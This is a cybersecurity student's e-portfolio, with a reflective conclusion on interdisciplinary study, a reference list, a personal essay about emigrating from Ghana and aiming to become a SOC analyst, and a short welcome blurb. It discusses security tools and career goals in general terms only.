Creating this artifact was a synthesis of everything my interdisciplinary program taught me about communication, teaching, and technical knowledge. It is also the artifact I am most proud of, because it represents not just what I know, but my ability to share what I know clearly and generously. In a field that sometimes gatekeeps knowledge unnecessarily, I believe that accessible, well-written guides like this one have real value (CompTIA, 2023).


Conclusion

Looking at this portfolio as a whole, I am struck by how thoroughly my interdisciplinary education shaped the professional I am becoming. Cybersecurity is often discussed as a purely technical field, but the evidence in this portfolio tells a different story. Every artifact here required not just technical knowledge, but writing skill, analytical thinking, ethical reasoning, and the ability to communicate across audiences. Those capacities came from courses in writing, social science, ethics, and organizational behavior — not from technical courses alone.

My IDS 300W coursework was particularly foundational. It gave me a framework for thinking about how knowledge is constructed across disciplines and why crossing disciplinary boundaries produces better thinking than staying within any single one (Repko & Szostak, 2017). That framework has made me a better cybersecurity student, and I believe it will make me a better SOC analyst. The threats I will face in that role will not respect disciplinary boundaries. They will be technical, human, organizational, and political all at once. My education has prepared me to meet them on all of those fronts.

I came to this program as a young man from Ghana who loved technology. I leave it as someone who understands that loving technology is not enough — that the most valuable professionals in this field are those who can think broadly, communicate clearly, and act decisively. This portfolio is my evidence that I am becoming that kind of professional.


References

CISA. (2021). Incident response recommendations and best practices. Cybersecurity and Infrastructure Security Agency. https://www.cisa.gov

CompTIA. (2023). Cybersecurity workforce study. CompTIA. https://www.comptia.org

Engebretson, P. (2013). The basics of hacking and penetration testing: Ethical hacking and penetration testing made easy(2nd ed.). Syngress.

Klein, G. (2021). Seeing what others don’t: The remarkable ways we gain insights. PublicAffairs.

Nakamura, L., & Zlatin, M. (2020). Technical communication in cybersecurity contexts. Journal of Technical Writing and Communication, 50(3), 245–268.

NIST. (2018). Framework for improving critical infrastructure cybersecurity (Version 1.1). National Institute of Standards and Technology. https://www.nist.gov/cyberframework

Repko, A. F., & Szostak, R. (2017). Interdisciplinary research: Process and theory (3rd ed.). SAGE Publications.

Rid, T., & Buchanan, B. (2015). Attributing cyber attacks. Journal of Strategic Studies, 38(1–2), 4–37.

Workman, M. (2008). Wisecrackers: A theory-grounded investigation of phishing and pretext social engineering threats to information security. Journal of the American Society for Information Science and Technology, 59(4), 662–674.

Personal Narrative Essay

By Prince Damte


There is a particular kind of clarity that comes with starting over. When I arrived in the United States from Ghana in 2019, in my early twenties, I carried with me little more than ambition and a lifelong fascination with technology. I did not know exactly what my path would look like. I only knew that America represented possibility, and that technology — in all its complexity and power — was the world I wanted to inhabit. What I could not have predicted then was that I would find my place not just in technology broadly, but in one of its most critical and urgent corners: cybersecurity.

Growing up in Ghana, technology was never far from my curiosity. I was drawn to computers the way some people are drawn to music or sport — instinctively, almost inexplicably. I tinkered. I watched. I asked questions that adults around me sometimes could not answer. The internet felt like a vast territory waiting to be explored, and I was always looking for the edges of it, the places where things worked in ways that were not immediately obvious. That curiosity, I would later learn, is one of the most important qualities a cybersecurity professional can have. The field rewards people who cannot help but ask why and how — people who are not satisfied with the surface of things.

When I made the decision to move to the United States, the choice to pursue technology formally felt natural. But it was not until I began my studies that I understood how many directions technology could take me. Software development, data science, IT management — the options were broad. It was during my early coursework that I encountered cybersecurity in a way that felt different from everything else. Not just as a technical discipline, but as something with real stakes. Every system I learned about had vulnerabilities. Every network had a perimeter that someone, somewhere, was trying to breach. And behind every breach was a real organization, real data, real people whose lives could be disrupted. That weight — the understanding that this work matters — is what drew me in and has kept me engaged ever since.

My journey into the hands-on side of cybersecurity began modestly. I started learning Kali Linux, the operating system that has become something of a home base for security professionals and ethical hackers. Working through its tools for the first time, I felt the same excitement I had felt as a child poking at computers in Ghana — the thrill of discovery, of learning how systems could be tested and understood from the inside out. Python followed, and with it a new appreciation for automation and scripting. Writing code to interact with systems, to scan them, to parse their outputs, opened up a new dimension of what cybersecurity work could look like. These were not just theoretical skills. They were the building blocks of a professional identity I was beginning to construct.

I have made mistakes along the way — tools that did not behave as expected, concepts that took weeks to click into place, moments where the complexity of the field felt genuinely overwhelming. But I have come to understand that struggle is not a sign of failure in this discipline. It is, in fact, the job. Cybersecurity is an adversarial field. The threats evolve, the tools change, and the only way to stay relevant is to stay curious and stay humble. Every difficult lab, every failed attempt followed by a successful one, has reinforced something in me: the belief that persistence is as important as any technical skill.

Today, I am working toward two professional certifications — CompTIA Security+ and a Microsoft certification — both of which represent my commitment to building a credential base that employers in this field recognize and respect. These are not just items on a résumé. They are proof of study, of dedication, and of a standard met. Pursuing them while also completing my degree has required discipline and time management that I did not know I had when I first arrived in this country. But that is part of the story, too. Immigration is an exercise in reinvention. You learn, quickly, that you are more capable than you thought.

My goal is to become a Security Operations Center (SOC) analyst — a role that sits at the intersection of everything I find compelling about cybersecurity. SOC analysts are the defenders. They monitor systems in real time, detect threats before they become disasters, and respond when breaches occur. The role demands exactly the combination of skills I have been developing: an understanding of networks, the ability to analyze threats quickly and accurately, and the technical grounding to take meaningful action. It is a career that is never static, never routine, and never without consequence. That suits me perfectly.

This e-portfolio is a record of that journey. It is a collection of the work I have done, the skills I have developed, and the thinking that has shaped me as a cybersecurity student and emerging professional. The three skills at its core — network security and defense, threat analysis and incident response, and ethical hacking and penetration testing — are not arbitrary categories. They are the pillars of the career I am building, chosen because they reflect both what I have learned and where I am going. Each artifact in this portfolio tells a piece of that story.

I came to America with a love of technology and a willingness to work. I leave this chapter of my education with something more specific: a discipline, a direction, and a set of skills that I believe can contribute meaningfully to a field that the world genuinely needs. Cybersecurity is not a background concern anymore. It is front-page news. It is national infrastructure. It is personal privacy. It is, in many ways, the defining technical challenge of our era. I am proud to be preparing myself to meet it — and this portfolio is where that preparation lives.

Welcome to My Portfolio

Hi, I’m Prince Damte — a Cybersecurity student at Old Dominion University, originally from Ghana. I’m passionate about AI development and how it intersects with cybersecurity to build smarter, safer digital systems. Through my studies in network security, ethical hacking, and cryptography, I’m working toward a future where technology empowers communities worldwide — starting with the African continent. This portfolio reflects my academic journey and professional growth. I welcome any feedback or connections from those who share a passion for technology.